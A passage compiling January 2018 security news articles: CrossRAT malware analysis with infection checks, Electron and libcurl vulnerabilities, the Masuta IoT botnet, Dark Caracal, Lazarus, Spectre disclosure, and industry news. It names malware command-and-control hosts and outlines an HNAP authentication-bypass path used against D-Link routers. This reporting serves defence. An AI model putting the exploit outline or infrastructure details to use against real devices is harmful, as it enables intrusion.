At the time of its discovery, the malware was not detected by almost all the anti-virus software (only two out of 58).

crossrat%20malware

The Dark Caracal attack chain implemented relies primarily on social engineering, the hackers used messages sent to the victims via Facebook group and WhatsApp messages. At a high-level, the hackers have designed three different kinds of phishing messages to trick victims into visiting a compromised website, a typical watering hole attack.

CrossRAT is written in Java programming language, for this reason, researchers can easily decompile it.
The popular former NSA hacker Patrick Wardle published a detailed analysis of the CrossRAT malware.

Once executed on the victim’s system, CrossRAT will determine the operating system it’s running on to trigger the proper installation procedure.

On Linux systems, the RAT also attempts to query systemd files to determine the distribution (i.e. Arch Linux, Centos, Debian, Kali Linux, Fedora, and Linux Mint).

Wardle explained that the author implemented specific persistence mechanisms for each operating system. Once installed the malware will attempt to contact the C&C server.
“Now the malware has persistently installed itself, it checks in with the C&C server for tasking. As noted the EFF/Lookout report the malware will connect to flexberry.com on port 2223. ” states the analysis published by Wardle.

The expert discovered that the CrossRAT includes reference ‘jnativehook Java library that provides global keyboard and mouse listeners for Java, but didn’t see any code within that implant that referenced the jnativehook package, likely because the analyzed version was still under development.

Wardle detailed the persistence mechanism implemented for each OS, this information is useful to detect the presence of CrossRAT on a system.

Windows:
Check the HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ registry key. If infected it will contain a command that includes, java, -jar and mediamgrs.jar.
Mac:
Check for jar file, mediamgrs.jar, in ~/Library. Also look for launch agent in /Library/LaunchAgents or ~/Library/LaunchAgents named mediamgrs.plist.
Linux:
Check for jar file, mediamgrs.jar, in /usr/var. Also look for an ‘autostart’ file in the ~/.config/autostart likely named mediamgrs.desktop.


Beware! Undetectable CrossRAT malware targets Windows, MacOS, and Linux systems
26.1.2018 thehackernews
Virus

Are you using Linux or Mac OS? If you think your system is not prone to viruses, then you should read this.
Wide-range of cybercriminals are now using a new piece of 'undetectable' spying malware that targets Windows, macOS, Solaris and Linux systems.
Just last week we published a detailed article on the report from EFF/Lookout that revealed a new advanced persistent threat (APT) group, called Dark Caracal, engaged in global mobile espionage campaigns.
Although the report revealed about the group's successful large-scale hacking operations against mobile phones rather than computers, it also shed light on a new piece of cross-platform malware called CrossRAT (version 0.1), which is believed to be developed by, or for, the Dark Caracal group.
CrossRAT is a cross-platform remote access Trojan that can target all four popular desktop operating systems, Windows, Solaris, Linux, and macOS, enabling remote attackers to manipulate the file system, take screenshots, run arbitrary executables, and gain persistence on the infected systems.
According to researchers, Dark Caracal hackers do not rely on any "zero-day exploits" to distribute its malware; instead, it uses basic social engineering via posts on Facebook groups and WhatsApp messages, encouraging users to visit hackers-controlled fake websites and download malicious applications.
CrossRAT is written in Java programming language, making it easy for reverse engineers and researchers to decompile it.

Since at the time of writing only two out of 58 popular antivirus solutions (according to VirusTotal) can detect CrossRAT, ex-NSA hacker Patrick Wardle decided to analyse the malware and provide a comprehensive technical overview including its persistence mechanism, command and control communication as well as its capabilities.
CrossRAT 0.1 — Cross-Platform Persistent Surveillance Malware
Once executed on the targeted system, the implant (hmar6.jar) first checks the operating system it's running on and then installs itself accordingly.
Besides this, the CrossRAT implant also attempts to gather information about the infected system, including the installed OS version, kernel build and architecture.
Moreover, for Linux systems, the malware also attempts to query systemd files to determine its distribution, like Arch Linux, Centos, Debian, Kali Linux, Fedora, and Linux Mint, among many more.
CrossRAT then implements OS specific persistence mechanisms to automatically (re)executes whenever the infected system is rebooted and register itself to the C&C server, allowing remote attackers to send command and exfiltrate data.
As reported by Lookout researchers, CrossRAT variant distributed by Dark Caracal hacking group connects to 'flexberry(dot)com' on port 2223, whose information is hardcoded in the 'crossrat/k.class' file.
CrossRAT Includes Inactive Keylogger Module

The malware has been designed with some basic surveillance capabilities, which get triggered only when received respective predefined commands from the C&C server.
Interestingly, Patrick noticed that the CrossRAT has also been programmed to use 'jnativehook,' an open-source Java library to listen to keyboard and mouse events, but the malware does not have any predefined command to activate this keylogger.
"However, I didn’t see any code within that implant that referenced the jnativehook package—so at this point it appears that this functionality is not leveraged? There may be a good explanation for this. As noted in the report, the malware identifies it’s version as 0.1, perhaps indicating it’s still a work in progress and thus not feature complete," Patrick said.
How to Check If You're Infected with CrossRAT?
Since CrossRAT persists in an OS-specific manner, detecting the malware will depend on what operating system you are running.
For Windows:
Check the 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\' registry key.
If infected it will contain a command that includes, java, -jar and mediamgrs.jar.
For macOS:
Check for jar file, mediamgrs.jar, in ~/Library.
Also look for launch agent in /Library/LaunchAgents or ~/Library/LaunchAgents named mediamgrs.plist.
For Linux:
Check for jar file, mediamgrs.jar, in /usr/var.
Also look for an 'autostart' file in the ~/.config/autostart likely named mediamgrs.desktop.
How to Protect Against CrossRAT Trojan?

Only 2 out of 58 antivirus products detect CrossRAT at the time of writing, which means that your AV would hardly protect you from this threat.
"As CrossRAT is written in Java, it requires Java to be installed. Luckily recent versions of macOS do not ship with Java," Patrick said.
"Thus, most macOS users should be safe! Of course, if a Mac user already has Java installed, or the attacker is able to coerce a naive user to install Java first, CrossRAT will run just dandy, even on the latest version of macOS (High Sierra)."
Users are advised to install behaviour-based threat detection software. Mac users can use BlockBlock, a simple utility developed by Patrick that alerts users whenever anything is persistently installed.


Critical Flaw Hits Popular Windows Apps Built With Electron JS Framework
26.1.2018 thehackernews
Vulnerebility

A critical remote code execution vulnerability has been reported in Electron—a popular web application framework that powers thousands of widely-used desktop applications including Skype, Signal, Wordpress and Slack—that allows for remote code execution.
Electron is an open-source framework that is based on Node.js and Chromium Engine and allows app developers to build cross-platform native desktop applications for Windows, macOS and Linux, without knowledge of programming languages used for each platform.
The vulnerability, assigned as the number CVE-2018-1000006, affects only those apps that run on Microsoft Windows and register themselves as the default handler for a protocol like myapp://.
"Such apps can be affected regardless of how the protocol is registered, e.g. using native code, the Windows registry, or Electron's app.setAsDefaultProtocolClient API," Electron says in an advisory published Monday.
The Electron team has also confirmed that applications designed for Apple's macOS and Linux are not vulnerable to this issue, and neither those (including for Windows) that do not register themselves as the default handler for a protocol like myapp://.
The Electron developers have already released two new versions of their framework, i.e. 1.8.2-beta.4, 1.7.11, and 1.6.16 to address this critical vulnerability.
"If for some reason you are unable to upgrade your Electron version, you can append—as the last argument when calling app.setAsDefaultProtocolClient, which prevents Chromium from parsing further options," the company says.
End users can do nothing about this vulnerability; instead, developers using Electron JS framework have to upgrade their applications immediately to protect their user base.
Much details of the remote code execution vulnerability have not been disclosed yet, neither the advisory named any of the vulnerable apps (that make themselves the default protocol handler) for security reason.
We will update you as soon as any details about the flaw come out.


EU Antitrust Regulators Fine Qualcomm $1.2 Billion Over Apple Deal
26.1.2018 thehackernews IT


The European Commission has levied a fine of €997 Million, approximately $1.2 Billion, against U.S. chipmaker Qualcomm Inc. for violating antitrust laws in a series of deals with Apple by "abusing its market dominance in LTE baseband chipsets."
According to the European Union (EU), Qualcomm paid Apple billions of dollars to make the iPhone-maker exclusively use its 4G chips in all its iPhones and iPads, reducing competition from other competing manufacturers in the LTE baseband chip industry like Intel.
The European Commission launched an investigation in 2015, which revealed that Qualcomm abused its market dominance in LTE baseband chipsets and struck a deal with Apple in 2011, which meant the iPhone maker would have to repay Qualcomm if it decided to use a rival's chipsets until the end of 2016, hurting innovation in the chip sector.
"This meant that no rival could effectively challenge Qualcomm in this market, no matter how good their products were. This is illegal under EU antitrust rules and why we have taken today's decision," EU competition commissioner Margrethe Vestager said in a press statement.
Apple received payments from Qualcomm for approximately 5 years between 2011 and 2016. The company still uses Qualcomm components in its iPhones and iPads, but it began using Intel LTE modems in its iPhone 7 and 7 Plus devices after the agreement ended.
The fine imposed on the chip maker is hefty, but won't hurt Qualcomm's bottom line significantly as it represents 4.9 percent of the company's turnover in 2017, according to the EU's antitrust commission.
Qualcomm said it 'strongly disagrees' with the European Commission's decision and will 'immediately appeal' it at the General Court of the European Union. The company also believes its agreement with Apple does not violate European Union competition law.
"We are confident this agreement did not violate EU competition rules or adversely affect market competition or European consumers," Qualcomm General Counsel Don Rosenberg said in a statement. "We have a strong case for judicial review, and we will immediately commence that process."
Not just one, Qualcomm is facing a patent fight with Apple over chip royalties, and simultaneously fending off a $100 billion hostile takeover from rival chipmaker Broadcom, but it rejected the bid last November, saying it 'dramatically undervalued' the company.


Yikes! Three armed men tried to rob a Bitcoin Exchange in Canada
26.1.2018 thehackernews Crime

As many non-tech savvy people think that Bitcoin looks like a Gold coin as illustrated in many stock images, perhaps these robbers also planned to rob a cryptocurrency exchange thinking that way.
All jokes apart, we saw one such attempt on Tuesday morning, when three men armed with handguns entered the offices of a Canadian Bitcoin exchange in Ottawa, and restrained four of its employees.
The intruders then struck one of the employees in the head with a handgun, asking them to make an outbound transaction from the cryptocurrency exchange.
A fifth employee in another cabin, who remained unseen in an office, called the police before any assets could be taken, and the robbers left empty-handed.
One of the suspects arrested later Wednesday after arriving police officers saw him run into a ravine north of Colonnade Road and deployed "extensive resources," including K-9 unit officers, to find him, CBC News reports.
"Police are looking for two additional suspects, both described as black males," the police says. "Investigators are also interested in identifying and speaking to a person of interest that was inside the premise as the suspects arrived. That person did not remain at the scene."
The suspect in custody, identified as 19-year-old Jimmy St-Hilaire, has been charged with the following offences:
5 counts of robbery with a firearm
5 counts of point a firearm
5 counts of forcible confinement
Wear disguise
Conspiracy to Commit an indictable offence
Carry concealed weapon
Possess firearm while prohibited
Possess weapon for committing an offence
Possess loaded regulated firearm
St-Hilaire is set to appear in court on January 24, 2018. Ottawa police are now looking for the remaining two suspects.
The authorities have not revealed the name of the cryptocurrency exchange.
A similar incident happened last month when armed robbers kidnapped a top executive at UK-registered crypto-exchange EXMO Finance and allegedly stole more than $1.8 million of Ether for releasing him.
The New York District Attorney's Office charged New Jersey native Louis Meza for the kidnapping and robbery, claiming Meza held "demanded that the victim turns over his cell phone, wallet, and keys while holding the victim at gunpoint."


Maersk chair revealed its company reinstalled 45,000 PCs and 4,000 Servers after NotPetya Attack
26.1.2018 securityaffairs
Ransomware

The shipping giant Maersk chair Jim Hagemann Snabe revealed its company reinstalled 45,000 PCs and 4,000 Servers after NotPetya the attack.
The shipping giant Maersk was one of the companies that suffered the NotPetya massive attack, in August 2017 the company announced that it would incur hundreds of millions in U.S. dollar losses due to the ransomware massive attack.

According to the second quarter earnings report, there were expecting losses between $200 million and $300 million due to “significant business interruption” because the company was forced to temporarily halt critical systems infected with the ransomware.

Maersk

Now the Møller-Maersk chair Jim Hagemann Snabe has shared further details on the attack suffered by the company during a speech at the World Economic Forum this week.

Snabe explained that the attack forced the IT staff to reinstall “4,000 new servers, 45,000 new PCs, and 2,500 applications,” practically “a complete infrastructure.”

The IT staff worked hard for ten days to restore normal operations.

“And that was done in a heroic effort over ten days,” Snabe said.

“Normally – I come from the IT industry – you would say that would take six months. I can only thank the employees and partners we had doing that.”

Snabe defined the incident as a “very significant wake-up call,” a strong security posture for a company is essential for the development of its business.

Snabe pointed out that Maersk was the victim of the militarization of a cyberspace, the damages were caused by a cyber weapon used by a foreign government to hit Ukraine.

Maersk ship docks worldwide every 15 minutes, unloading between 10,000 to 20,000 containers. The effects of the attack were dramatic and only the heroic effort of the staff that manually restored the normal situation allowed to contain the damages.

Snabe claimed only “a 20 per cent drop in volumes,” and described the efforts of its IT staff as “human resilience”.

Snabe is aware of the risks for companies that operate on the Internet and urges an improvement of infrastructure.

“There is a need for a radical improvement of infrastructure.” he said.

Maersk chair also highlighted the importance of collaboration between companies, technology companies, and law enforcement.


Former Yahoo CISO Bob Lord Joins DNC
26.1.2018 securityweek IT

Former Yahoo chief information security officer Bob Lord has been appointed chief security officer at the Democratic National Committee (DNC), the formal governing body for the United States Democratic Party.

The announcement was made on Thursday and Lord has already told his Twitter followers that he is looking to hire.

“Very honored to be able to work with [DNC CTO Raffi Krikorian], [DNC Chairman Tom Perez], and the rest of the amazing team at the DNC,” Lord said on Twitter.Bob Lord named CSO of DNC
Bob%20Lord%20named%20CSO%20of%20DNC

Lord is the DNC’s first CSO. His hiring comes after the organization was the target of cyberattacks in the months leading up to the 2016 presidential election in the United States. Security firms and intelligence agencies attributed the attacks to threat groups previously linked to the Russian government.

Before joining the DNC, Lord was Yahoo’s CISO for nearly two years. While at the tech firm, he led the investigations into the massive data breaches suffered by the company in 2013 and 2014. He was lured by Yahoo after the company’s former security chief, Alex Stamos, joined Facebook as CSO.

A veteran with more than 20 years of experience in cybersecurity, Lord has held leadership positions at AOL, Red Hat, Twitter and Rapid7.


Information Disclosure, DoS Flaws Patched in libcurl
25.1.2018 securityweek
Vulnerebility

The developers of the popular multiprotocol data transfer library libcurl informed users on Wednesday that the latest version addresses two vulnerabilities.

Libcurl is a free and highly portable file transfer library that supports roughly two dozen protocols and various features. The libcurl website lists more than 250 organizations that use the library in their products, including Adobe, Apple, the BBC, BMW, Broadcom, Cisco, Electronic Arts, Facebook, Google, Intel, Mozilla, Samsung, Sony, VMware and several cybersecurity firms.

The latest Libcurl release, version 7.58.0, patches a total of 82 bugs, including two vulnerabilities that can lead to information disclosure or a denial-of-service (DoS) condition.

One of the security holes, tracked as CVE-2018-1000007, can lead to authentication data getting leaked to third parties.

“When asked to send custom headers in its HTTP requests, libcurl will send that set of headers first to the host in the initial URL but also, if asked to follow redirects and a 30X HTTP response code is returned, to the host mentioned in URL in the Location: response header value,” developers said in an advisory.

“Sending the same set of headers to subsequest hosts is in particular a problem for applications that pass on custom Authorization: headers, as this header often contains privacy sensitive information or data that could allow others to impersonate the libcurl-using client's request,” they added.

This vulnerability has existed in the libcurl code for a long time. “It existed in the first commit we have recorded in the project,” developers noted.

The second flaw, identified as CVE-2018-1000005, has been described as an out-of-bounds read issue that can lead to a DoS condition or information disclosure.

“The problem is that the code that creates HTTP/1-like headers from the HTTP/2 trailer data once appended a string like ‘:’ to the target buffer, while this was recently changed to ‘: ‘ (a space was added after the colon) but the associated math wasn't updated correspondingly,” developers explained. “When accessed, the data is read out of bounds and causes either a crash or that the (too large) data gets passed to the libcurl callback.”

This vulnerability only affects libcurl versions 7.49.0 through 7.57.0.

CVE-2018-1000007 was reported to cURL developers on January 18, while CVE-2018-1000005 was brought to their attention on January 10. Developers said they had not been aware of any attempts to exploit these flaws.

Various Linux distributions are also working on pushing out updates that patch the flaws.


Google Parent Alphabet Launches Cybersecurity Firm Chronicle
25.1.2018 securityweek Cyber

Google parent Alphabet on Wednesday announced a new standalone business dedicated to cybersecurity.

Called Chronicle, the newly unveiled company was born in 2016 as a project within X, Alphabet’s “moonshot” factory, with ambitions of analyzing massive amounts of data to provide security teams with insights into areas of “likely vulnerability” to help them protect their data.

“X, the moonshot factory, has been our home for the last two years while we figured out where we had the potential to make the biggest impact on this enormous problem,” Stephen Gillett, CEO of Chronicle, wrote in a blog post.

The new company, Gillett says, “will have two parts: a new cybersecurity intelligence and analytics platform that we hope can help enterprises better manage and understand their own security-related data; and VirusTotal, a malware intelligence service acquired by Google in 2012 which will continue to operate as it has for the last few years.”

“We want to 10x the speed and impact of security teams’ work by making it much easier, faster and more cost-effective for them to capture and analyze security signals that have previously been too difficult and expensive to find,” added Gillett, a former executive at Symantec, Best Buy and Starbucks. “We are building our intelligence and analytics platform to solve this problem.”

Few details have been provided, and many questions remain on exactly what Chronicle’s platform will bring to the table, and how it will be deployed in an enterprise. With that said, Google has been innovative with its own internal security tools and initiatives, and it’s likely that Chronicle’s offerings will be compelling.

In June 2017, Google shared details on the security infrastructure that protects its data centers. Late last year, Google also shared detailed information on how it protects service-to-service communications within its infrastructure at the application layer and the system it uses for data protection. The search giant also has provided technical details on how it uses a “Tiered Access” model to secure devices for its global workforce of more than 61,000 employees.

“Inspired by Google’s own security techniques, we’re advancing cybersecurity for enterprises of all sizes,” Chronicle’s website says.

Chronicle, says X’s Astro Teller, is starting “by trying to give organizations a much higher-resolution view of their security situation than they’ve ever had by combining machine learning, large amounts of computing power and large amounts of storage.”

According to Gillett, the company will have its own contracts and data policies with its customers, while also being able to tap expertise across the entire Alphabet ecosystem.


Mirai-Based Masuta Botnet Weaponizes Old Router Vulnerability
25.1.2018 securityweek BotNet 
Vulnerebility

A new Internet of Things-targeting piece of malware based on Mirai’s publicly released source code has been observed at large, ensnaring devices into a botnet.

Dubbed Masuta, the botnet has at least two variants at large, and is believed to be the work of a well-known IoT threat actor, NewSky Security says. What’s also unique to the botnet is that it exploits an old router vulnerability, being the first threat known to weaponize it in a botnet campaign.

Masuta (Japanese for “master”) botnet’s source code was found on an invite only dark forum. The malware’s configuration file, the researchers discovered, uses a different seed of the cipher key compared to Mirai, having the strings in the configuration files XORed by 0x45.

Thus, the researchers discovered that it uses the domain nexusiotsolutions(dot)net, the command and control (C&C) server that Nexus Zeta, the individual involved in the recent Satori attacks, uses. The domain was registered using the nexuszeta1337@gmail(.)com email address.

Thus, NewSky Security suggests that Nexus Zeta has been involved in the creation of the Masuta botnet, in addition to building Satori, the Mirai variant that has been wreaking havoc over the past couple of months.

In fact, Masuta isn’t new either, and attacks involving it have been steadily increasing since September, and the botnet’s standard variant has been observed using several known/weak/default credentials to compromise IoT devices.

An evolved variant of Masuta, called PureMasuta, contains the most typical of Mirai style code, and a list of weak credentials to use. What makes this malware variant stand out, however, is its usage of EDB 38722 D-Link exploit.

The exploit PureMasuta uses resides in the HNAP (Home Network Administration Protocol), which is based on the SOAP protocol. It is possible to craft a SOAP query to bypass authentication by using hxxp://purenetworks.com/HNAP1/GetDeviceSettings, and improper string handling can lead to arbitrary code execution, and an attacker can abuse this combination of issues to run code on targeted devices.

What the botnet does is to download a shell script from the C&C server and run it. Thus, the malware author first bypasses authentication and then executes code on the targeted devices.

The PureMasuta variant uses the same C&C server (93.174.93.63) as the original Masuta variant, which led the researchers to believe it is the evolved creation of the same threat actor.

“Nexus Zeta is no stranger when it comes to implementing SOAP related exploits. The threat actor has already been observed in implementing two other known SOAP related exploits, CVE-2014–8361 and CVE-2017–17215 in his Satori botnet project,” NewSky Security notes.

Thus, the TR-069 bug and EDB 38722 are the third and fourth SOAP related exploits abused by IoT botnets.

“Protocol exploits are more desirable for threat actors as they usually have a wider scope. A protocol can be implemented by various vendors/models and a bug in the protocol itself can get carried on to a wider range of devices,” the researchers conclude.


Lebanon Must Investigate Claims of Mass Spying: Rights Groups
25.1.2018 securityweek BigBrothers

Eight rights groups including Human Rights Watch called on Lebanese authorities Wednesday to investigate reports of a massive espionage campaign traced back to a government security agency.

Digital researchers last week said they had uncovered a hacking campaign using malware-infected messaging apps to steal smartphone data from people in more than 20 countries, including journalists and activists.

The report tracked the threat, which the researchers dubbed "Dark Caracal", to a building in Beirut belonging to the Lebanese General Security Directorate.

Eight rights groups and media organizations called on Lebanon's general prosecutor on Wednesday to investigate who was behind the campaign.

"If these allegations are true, this intrusive surveillance makes a mockery of people's right to privacy and jeopardises free expression and opinion," said Lama Fakih, deputy Middle East director at Human Rights Watch. "Lebanese authorities should immediately end any ongoing surveillance that violates the nation's laws or human rights, and investigate the reports of egregious privacy violations."

Other signatories included the Lebanese Center for Human Rights (CLDH), the SKeyes Center for Media and Cultural Freedom, and Lebanon's Social Media Exchange (SMEX).

Hundreds of gigabytes of data have been taken from thousands of victims in more than 21 countries, said the report, authored by digital rights group Electronic Frontier Foundation and mobile security firm Lookout.

They called Dark Caracal "one of the most prolific" mobile espionage campaigns to date. With fake versions of secure messaging services like WhatsApp and Signal, the scheme has enabled attackers to take pictures, capture audio, pinpoint locations, and mine handsets for private data.

According to the report, Dark Caracal used FinFisher, surveillance software used by governments around the world.

In 2015, Toronto-based research group Citizen Lab found that General Security and other Lebanese security forces have used FinFisher for surveillance in Lebanon.

General Security chief Abbas Ibrahim did not explicitly deny the report.

"The report is very, very, very exaggerated. We don't have these capabilities. I wish we had those abilities," he said.

In comments to the media, Interior Minister Nouhad Mashnuq also appeared to confirm there was at least some truth to the report. "It's not that it's not true, it's just very overblown," said Mashuq.


Lawmakers Raise Questions About Disclosure of CPU Flaws
25.1.2018 securityweek
Vulnerebility

The U.S. House Energy and Commerce Committee on Wednesday sent letters to several tech giants, raising questions about how the disclosure of the CPU vulnerabilities known as Spectre and Meltdown was handled.

Lawmakers have asked the CEOs of Intel, AMD, ARM, Apple, Google and Microsoft to answer a series of questions on how the disclosure of the flaws was coordinated.

Specifically, the tech giants have been asked about why an embargo was imposed and who proposed it, when were US-CERT and CERT/CC notified, the impact of the embargo on critical infrastructure and other technology companies, the resources and best practices used in implementing the embargo, and lessons learned. The targeted companies have been instructed to respond by February 7.

The Meltdown and Spectre vulnerabilities allow malicious applications to exploit weaknesses in CPU designs and bypass memory isolation mechanisms. An attacker can leverage the flaws to access data as it’s being processed, including passwords, photos, documents, and emails.

The vulnerabilities were discovered independently by researchers at Google and various universities and companies. Major vendors were first notified in June 2017 and the disclosure of the flaws was initially planned for January 9, but some experts figured out that Microsoft and Linux developers had been preparing patches for critical CPU flaws and the disclosure was moved to January 3.

The companies that were notified quickly rolled out patches after information on the Meltdown and Spectre attack methods was made public – some firms released fixes even before disclosure – but some organizations, such as Digital Ocean, were caught off guard by the news and complained about the embargo.

“While we acknowledge that critical vulnerabilities such as these create challenging trade-offs between disclosure and secrecy, as premature disclosure may give malicious actors time to exploit the vulnerabilities before mitigations are developed and deployed, we believe that this situation has shown the need for additional scrutiny regarding multi-party coordinated vulnerability disclosures,” the congressional committee wrote in its letter.

“As more products and services become connected, no one company, or even one sector, working in isolation can provide sufficient protection for their products and users,” the lawmakers added. “Today, effective responses require extensive collaboration not only between individual companies, but also across sectors traditionally siloed from one another. This reality raises serious questions about not just the embargo imposed on information regarding the Meltdown and Spectre vulnerabilities, but on embargos regarding cybersecurity vulnerabilities in general.”

While many companies have managed to quickly address the vulnerabilities, mitigations have been found to introduce performance penalties and cause systems to become unstable. Both software and microcode updates caused problems for users, and system manufacturers have decided to halt BIOS updates due to buggy patches provided by Intel.


Chrome 64 Brings Additional Mitigations for CPU Flaw
25.1.2018 securityweek
Vulnerebility

Google this week released Chrome 64 in the stable channel with fixes for 53 security flaws and with additional mitigations against the web-exploitable “Spectre” CPU vulnerability.

Made public in the beginning of this year along with a bug called Meltdown, Spectre is a speculative side-channel attack technique impacting modern processors from Intel, AMD, and ARM. Putting billions of devices at risk, the two vulnerabilities have fueled an industry-wide race to release patches and mitigations.

In early December 2017, Google added Site Isolation to Chrome 63 as the first step in its attempt to mitigate these attack methods. The new Chrome release, available for Windows, Mac, and Linux as version 64.0.3282.119, brings additional mitigations against the speculative side-channel attack techniques.

The new browser iteration also includes an improved pop-up blocker, capable of preventing sites that employ abusive experiences from opening tabs or windows. Some of these deceptive tactics include masquerading links to third-party websites as play buttons or other site controls, or using transparent overlays on websites that capture all clicks and open new tabs or windows.

Site owners can check whether their websites have been found to use such abusive experiences by using the Abusive Experiences Report in Google Search Console. Thus, they can improve their user experience, Google says.

In addition to security improvements and fixes, Chrome 64 also brings some new features for developers, Google revealed in a blog post.

Of the 53 vulnerabilities that Chrome 64 patches, nearly half were discovered by external researchers, most of which are Medium and Low severity bugs.

Three High risk issues were resolved in the application: CVE-2018-6031 (Use after free in PDFium), CVE-2018-6032 (Same origin bypass in Shared Worker), and CVE-2018-6033 (Race when opening downloaded files). Google awarded the reporting researchers $3000, $2000, and $1000, respectively.

The Medium severity bugs addressed in Chrome 64 include an integer overflow issue in Blink, several insufficient isolation of devtools from extensions flaws, integer underflow in WebAssembly, insufficient user gesture requirements in autofill, heap buffer overflow in WebGL, XSS in DevTools, content security policy bypass, URL spoof issues in Navigation and OmniBox, insufficient escaping with external URL handlers, and cross origin URL leak in WebGL.

Google also resolved a referrer policy bypass bug in Blink, URL spoofing in Omnibox, UI spoof flaws in Permissions and in OmniBox, referrer leak in XSS Auditor, incomplete no-referrer policy implementation, leak of page thumbnails in New Tab Page, and use after free in WebUI vulnerabilities.

Overall, the Internet giant paid over $20,000 in bug bounties to the researchers who reported these vulnerabilities. However, the company hasn’t revealed all of the paid rewards yet.


Railway Cybersecurity Firm Cylus Emerges From Stealth
25.1.2018 securityweek Cyber

Cylus Obtains $4.7 Million in Funding to Help Protect Rail Industry Against Cyberattacks

Cylus, an Israel-based startup that specializes in cybersecurity solutions for the rail industry, emerged from stealth mode on Thursday with $4.7 million in seed funding.

Researchers have warned on several occasions in the past years that modern railway systems are vulnerable to cyberattacks, and the rail industry has been targeted by both cybercriminals and state-sponsored cyberspies.

Cylus aims to address the challenges of securing railway systems by developing a solution that is specifically designed for this sector. The product relies on a set of non-intrusive sensors that provide deep visibility into operational networks and help detect malicious activities. Customers are provided an automated assessment and instructions on how to respond when a threat is detected.

Railway Cybersecurity Startup Cylus Emerges From Stealth

The sensors are deployed in control centers, train management systems, interlocking systems, rolling stock, and trackside components. Information collected by the sensors is fed to an on-premises server that aggregates data and generates alerts based on rules derived from machine learning algorithms and research conducted by Cylus.

A centralized dashboard provides a view of all components, and alerts users when suspicious activities are detected, including failed authentication attempts, abnormal signaling communications, and unauthorized communications between components.

In addition to step-by-step instructions on how to respond to a specific threat, Cylus’ product offers forensic analysis capabilities designed to allow railroad companies to investigate incidents.

Cylus has obtained $4.7 million in seed funding from Zohar Zisapel, Magma Venture Partners, Vertex Ventures, and the SBI Group.

“Current approaches to cybersecurity do not fit the architecture of railway networks today,” said Cylus CEO Amir Levintal. “Our team of world-class cyber specialists together with rail industry experts have tailored a solution to the industry’s unique requirements. Our solution enables rail companies to detect cyber-attacks in their operational network, including their signaling systems and rolling stocks, and block attackers before they can cause any damage. The automotive industry has woken up to the critical need for cyber protection– it’s time the railway industry got on board as well.”

Cylus told SecurityWeek that it’s currently in negotiations with several large national railways to test its product. Pricing is scalable and depends on the specific needs of each customer.

“Railway companies cannot compromise on passenger safety, and one of the pillars of passenger safety is cybersecurity,” said Boaz Zafrir, President of Cylus and former CEO of Israel Railways. “Railway executives are acutely aware of the dangers and are looking for answers. The extraordinary team at Cylus has rich experience creating effective cybersecurity solutions, and I am confident that the company's unique technology will help keep passengers safe all over the world.”


North Korea-linked Lazarus Hackers Update Arsenal of Hacking Tools
25.1.2018 securityweek BigBrothers

Recent cyberattacks associated with the North Korea-linked Lazarus group have used an evolved backdoor, along with a Remote Controller tool, Trend Micro reports.

Targeting financial institutions, the campaign employed watering hole attacks and an evolved variant of the Lazarus-linked RATANKBA Trojan, which is capable of delivering multiple payloads, including hacking tools and software targeting banking systems.

The Lazarus group has been active since at least 2009 and is believed to be backed by the North Korean government. The threat actor has targeted government, military, media, aerospace, financial and manufacturing organizations, and is believed to be the most serious threat against banks.

Servers the group used as part of the recently observed campaign for temporarily holding stolen data allowed security researchers to gain insight into attacks and victims. Thus, they discovered that around 55% of the victims were located in India and neighboring countries and that most of them didn’t use enterprise versions of Microsoft software.

In a December 2017 report, Proofpoint researchers revealed that Lazarus had started targeting individuals, and that a new Windows executable downloader and a new first-stage implant were being used in attacks.

“Less than 5% of the victims were Microsoft Windows Enterprise users, which means that currently, RATANKBA mostly affects smaller organizations or individual users, not larger organizations. It’s possible that Lazarus is using tools other than RATANKBA to target larger organizations,” Trend Micro says.

By looking at the victims’ IP addresses, the security researchers also determined that none can be associated with a large bank or a financial institution. However, victims that are likely employees of web software development companies in India and South Korea appear to have been targeted.

The hackers delivered the RATANKBA malware to their intended targets via malicious Office documents (containing topics related to software development or digital currencies), CHM files, and script downloaders. The goal of the attacks was to install the RATANKBA backdoor onto the victims’ machines to steal user information and execute commands on the system.

The hackers use a Remote Controller tool to send jobs to compromised endpoints. Through the controller, attackers queue tasks on the main server, and RATANKBA connects to this server to retrieve the tasks and execute it. This means that real-time communication between the backdoor and the attacker isn’t employed.

The controller provides a graphical UI interface and allows the attacker to both push code to the server and download victim profiles from it.

The RATANKBA variant used in these attacks was written in Powershell, an evolution from the original variant, which was in PE form. The new malware iteration is more difficult to detect.

The members of the Lazarus group, Trend Micro says, appear to be native Korean speakers, “or at least have Korean language proficiency that is at the near-native level.” At least one of them is believed to also understand Chinese. The group appears interested in crypto-currencies such as Bitcoin (BTC) and Ant Share (NEO).

“Given Lazarus’ use of a wide array of tools and techniques in their operations, it’s reasonable to assume that the group will continue to use ever-evolving tactics in their malicious activities. Overall, an organization will need multilayered security strategies, as Lazarus and other similar groups are experienced cybercriminals who employ different strategies to get past organizational defenses,” the researchers conclude.


New Targets, $2 Million in Prizes Announced for Pwn2Own 2018
25.1.2018 securityweek Congress

Trend Micro’s Zero Day Initiative (ZDI) announced on Thursday that this year’s Pwn2Own hacking competition offers $2 million in cash and prizes, with several new pieces of software added to the list of targets.

Pwn2Own 2018 is scheduled to take place on March 14-16 alongside the CanSecWest conference in Vancouver, Canada. This year, ZDI has partnered with Microsoft for the event, and VMware has been announced as a sponsor.

This year’s categories are virtualization, web browsers, enterprise applications, servers, and the Windows Insider Preview challenge.

In the virtualization category, Pwn2Own 2018 introduces a new target, namely Oracle VirtualBox. Researchers can earn $35,000 and a $30,000 bonus if they can execute a privilege escalation via a Windows kernel vulnerability on the host. The base prize for VMware Workstation is $70,000 and for Microsoft Hyper-V it’s $150,000.

All major web browsers are targeted at Pwn2Own 2018. A sandbox escape can earn contestants $60,000 if it works on Chrome or Edge, $55,000 on Safari, and $40,000 on Firefox. Hackers can earn a bonus of $50,000-$70,000 if they combine their exploit with a virtual machine escape via a kernel privilege escalation vulnerability.

The targeted apps in the enterprise category are Adobe Reader, with a maximum prize of $90,000, Office 365 ProPlus, with a maximum prize of $50,000, and Microsoft Outlook, for which organizers are prepared to pay out up to $100,000. This will be the first time Outlook is a target at Pwn2Own.

In the servers category, there are no less than three new targets, including NGINX, Microsoft Windows SMB, and OpenSSL. Apache Web Server, the only target in this category in last year’s event, will remain on the list. Vulnerabilities in each of these pieces of software can earn researchers up to $100,000.

